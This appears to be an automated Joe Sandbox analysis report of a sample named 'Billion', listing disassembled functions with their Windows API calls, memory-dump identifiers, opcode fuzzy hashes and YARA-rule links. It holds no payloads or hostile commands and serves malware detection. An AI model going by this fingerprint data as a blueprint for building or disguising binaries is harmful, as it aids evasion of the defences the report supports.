                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                                                                                          • String ID: @$(
                                                                                                                                                                                                                                                                                                          • API String ID: 3962739598-24772804
                                                                                                                                                                                                                                                                                                          • Opcode ID: 63048ce2aa2d6bce3f4ca6131bf8d8e49c2b1bd00d58f2bd17fe747f85e2308c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 972e147f71c0196c647e4f58d5b630cffc34987af6661203c3a3c40dbf60d65c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63048ce2aa2d6bce3f4ca6131bf8d8e49c2b1bd00d58f2bd17fe747f85e2308c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FFB18931600219EFCF15CF68C989BAE7BB2BF54708F598069EC48AB295D770ED80CB51
                                                                                                                                                                                                                                                                                                          Function 001C976A Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001324B0
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001C97B6
                                                                                                                                                                                                                                                                                                          • GetFocus.USER32 ref: 001C97C6
                                                                                                                                                                                                                                                                                                          • GetDlgCtrlID.USER32(00000000), ref: 001C97D1
                                                                                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 001C9879
                                                                                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 001C992B
                                                                                                                                                                                                                                                                                                          • GetMenuItemCount.USER32(?), ref: 001C9948
                                                                                                                                                                                                                                                                                                          • GetMenuItemID.USER32(?,00000000), ref: 001C9958
                                                                                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 001C998A
                                                                                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 001C99CC
                                                                                                                                                                                                                                                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 001C99FD
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                                                                                                                                                          • String ID: 0$(
                                                                                                                                                                                                                                                                                                          • API String ID: 1026556194-3977433327
                                                                                                                                                                                                                                                                                                          • Opcode ID: 14ece24472c808b3a431ad32e6ef1b2a90b1fe45d6741d0b648895d98511a405
                                                                                                                                                                                                                                                                                                          • Instruction ID: 64c859f4c42f1362d240dad2fdb39bc6123521d6a4b08eeb2e4d3ebfafec26d7
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14ece24472c808b3a431ad32e6ef1b2a90b1fe45d6741d0b648895d98511a405
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5581AC715083459FDB10CF24D888FABBBE8FBA9714F10092DF98597291DB70D945CBA2
                                                                                                                                                                                                                                                                                                          Function 001B2FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 001B3035
                                                                                                                                                                                                                                                                                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 001B3045
                                                                                                                                                                                                                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 001B3051
                                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 001B305E
                                                                                                                                                                                                                                                                                                          • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 001B30CA
                                                                                                                                                                                                                                                                                                          • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 001B3109
                                                                                                                                                                                                                                                                                                          • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 001B312D
                                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 001B3135
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 001B313E
                                                                                                                                                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 001B3145
                                                                                                                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,?), ref: 001B3150
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                                          • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                                                                                                          • Opcode ID: de769f9eda788cdddd128870df8dab7f52148f01d6d5fcd36039945a218be09d
                                                                                                                                                                                                                                                                                                          • Instruction ID: 89797df3c371f47386f11f602be68403b4643cbcde084e3860c2c44dc5077cf3
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de769f9eda788cdddd128870df8dab7f52148f01d6d5fcd36039945a218be09d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D261F2B5D00219EFCF05CFA8D884EAEBBB5FF48310F248529E955A7250D771AA51CFA0
                                                                                                                                                                                                                                                                                                          Function 001952AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 001952E6
                                                                                                                                                                                                                                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00195328
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00195339
                                                                                                                                                                                                                                                                                                          • CharUpperBuffW.USER32(?,00000000), ref: 00195345
                                                                                                                                                                                                                                                                                                          • _wcsstr.LIBVCRUNTIME ref: 0019537A
                                                                                                                                                                                                                                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 001953B2
                                                                                                                                                                                                                                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 001953EB
                                                                                                                                                                                                                                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00195445
                                                                                                                                                                                                                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00195477
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 001954EF
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                                                                                                                                                          • String ID: ThumbnailClass
                                                                                                                                                                                                                                                                                                          • API String ID: 1311036022-1241985126
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2a63387da0b166cceab99cca60c7a75bdf820ee8e5af54ac233084149a1d72d8
                                                                                                                                                                                                                                                                                                          • Instruction ID: 099987505d6f59f1fde5bfe9f4486c26cb073b01209e75e10eddf2071e91ed2e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a63387da0b166cceab99cca60c7a75bdf820ee8e5af54ac233084149a1d72d8
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C991E471104B06AFDB0ADF24C895BAAB7AAFF10304F004529FA9A93091EB31ED55CB91
                                                                                                                                                                                                                                                                                                          Function 0019C8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(002029C0,000000FF,00000000,00000030), ref: 0019C973
                                                                                                                                                                                                                                                                                                          • SetMenuItemInfoW.USER32(002029C0,00000004,00000000,00000030), ref: 0019C9A8
                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 0019C9BA
                                                                                                                                                                                                                                                                                                          • GetMenuItemCount.USER32(?), ref: 0019CA00
                                                                                                                                                                                                                                                                                                          • GetMenuItemID.USER32(?,00000000), ref: 0019CA1D
                                                                                                                                                                                                                                                                                                          • GetMenuItemID.USER32(?,-00000001), ref: 0019CA49
                                                                                                                                                                                                                                                                                                          • GetMenuItemID.USER32(?,?), ref: 0019CA90
                                                                                                                                                                                                                                                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0019CAD6
                                                                                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0019CAEB
                                                                                                                                                                                                                                                                                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0019CB0C
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                                                                                                          • API String ID: 1460738036-4108050209
                                                                                                                                                                                                                                                                                                          • Opcode ID: 7b2682a71016c5939436aff6ee90d117ebc6b5263744bb458b81f87a48b54a2c
                                                                                                                                                                                                                                                                                                          • Instruction ID: d22690b5dc3b9bf57d60975762c340f64701def43d8c94dde4b0e4cd78e5dfac
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b2682a71016c5939436aff6ee90d117ebc6b5263744bb458b81f87a48b54a2c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91619F7090024AAFDF15CF64D989EEEBFB9FB45388F044055E992A3251D730ED45CBA1
                                                                                                                                                                                                                                                                                                          Function 0019E4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0019E4D4
                                                                                                                                                                                                                                                                                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0019E4FA
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0019E504
                                                                                                                                                                                                                                                                                                          • _wcsstr.LIBVCRUNTIME ref: 0019E554
                                                                                                                                                                                                                                                                                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0019E570
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                                                                                                                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                                                                                          • API String ID: 1939486746-1459072770
                                                                                                                                                                                                                                                                                                          • Opcode ID: e45a41ec43656f98ade537b387cd338ce0af484646aeae2e74ff77f19e722345
                                                                                                                                                                                                                                                                                                          • Instruction ID: 41a8ede8815cb4fbba9ab039f62889dd860c096c61e4c6cfd696b86f5f156cca
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e45a41ec43656f98ade537b387cd338ce0af484646aeae2e74ff77f19e722345
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4341F572900314BBEB01ABB4DC47EBF77ACEF65711F000029FD00AA082FB79DA4592A5
                                                                                                                                                                                                                                                                                                          Function 001C955E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 149windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001324B0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001319CD: GetCursorPos.USER32(?), ref: 001319E1
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001319CD: ScreenToClient.USER32(00000000,?), ref: 001319FE
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001319CD: GetAsyncKeyState.USER32(00000001), ref: 00131A23
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001319CD: GetAsyncKeyState.USER32(00000002), ref: 00131A3D
                                                                                                                                                                                                                                                                                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 001C95C7
                                                                                                                                                                                                                                                                                                          • ImageList_EndDrag.COMCTL32 ref: 001C95CD
                                                                                                                                                                                                                                                                                                          • ReleaseCapture.USER32 ref: 001C95D3
                                                                                                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 001C966E
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 001C9681
                                                                                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 001C975B
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                                                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID$( $( $`
                                                                                                                                                                                                                                                                                                          • API String ID: 1924731296-133163302
                                                                                                                                                                                                                                                                                                          • Opcode ID: a5f4fe32a8028bd12e8f6cebb325e7e52cf1a9536afa5fc5176174d61ac6f871
                                                                                                                                                                                                                                                                                                          • Instruction ID: b7a92e0a52edb080d88a4b7df17dc76e88be2d5c96d4a67a9e0a1c48545fa449
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5f4fe32a8028bd12e8f6cebb325e7e52cf1a9536afa5fc5176174d61ac6f871
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87517B70104304AFD704EF24DC9AFAA77E4FBA8714F500A2DF996962E2DB70D948CB52
                                                                                                                                                                                                                                                                                                          Function 001BD694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 001BD6C4
                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 001BD6ED
                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 001BD7A8
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001BD70A
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 001BD71D
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 001BD72F
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 001BD765
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 001BD788
                                                                                                                                                                                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 001BD753
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                                                                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                                          • API String ID: 2734957052-4033151799
                                                                                                                                                                                                                                                                                                          • Opcode ID: ba0e1482bc890afad0a641f29da50dcbfd56ddb537022e2d2aa3f4a3c50391ca
                                                                                                                                                                                                                                                                                                          • Instruction ID: 8916c6af5266f6bd5fbe1b933469e9bfe4f016cc24af70171ed7c7616cb81b0a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba0e1482bc890afad0a641f29da50dcbfd56ddb537022e2d2aa3f4a3c50391ca
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3317075A01129BBDB259BA0EC88EFFBB7CEF55754F000165F905E3140EB349E859AA0
                                                                                                                                                                                                                                                                                                          Function 0019EFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • timeGetTime.WINMM ref: 0019EFCB
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0014F215: timeGetTime.WINMM(?,?,0019EFEB), ref: 0014F219
                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(0000000A), ref: 0019EFF8
                                                                                                                                                                                                                                                                                                          • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 0019F01C
                                                                                                                                                                                                                                                                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0019F03E
                                                                                                                                                                                                                                                                                                          • SetActiveWindow.USER32 ref: 0019F05D
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0019F06B
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 0019F08A
                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000000FA), ref: 0019F095
                                                                                                                                                                                                                                                                                                          • IsWindow.USER32 ref: 0019F0A1
                                                                                                                                                                                                                                                                                                          • EndDialog.USER32(00000000), ref: 0019F0B2
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                                                                                                                          • String ID: BUTTON
                                                                                                                                                                                                                                                                                                          • API String ID: 1194449130-3405671355
                                                                                                                                                                                                                                                                                                          • Opcode ID: d98311cc31f0a8ac7c34b9e7bf6aae408c45cc9c21295fa49b97674663dd847c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 5e355aa0480eeba7f4aee691045c48a76b5744525522d94b93ec82a3800fe321
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d98311cc31f0a8ac7c34b9e7bf6aae408c45cc9c21295fa49b97674663dd847c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28218E75100318BFEB10AF20FC8DE26BFAEF758755B080039F605D2672CB728D868A55
                                                                                                                                                                                                                                                                                                          Function 0019F313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
                                                                                                                                                                                                                                                                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0019F374
                                                                                                                                                                                                                                                                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0019F38A
                                                                                                                                                                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0019F39B
                                                                                                                                                                                                                                                                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0019F3AD
                                                                                                                                                                                                                                                                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0019F3BE
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
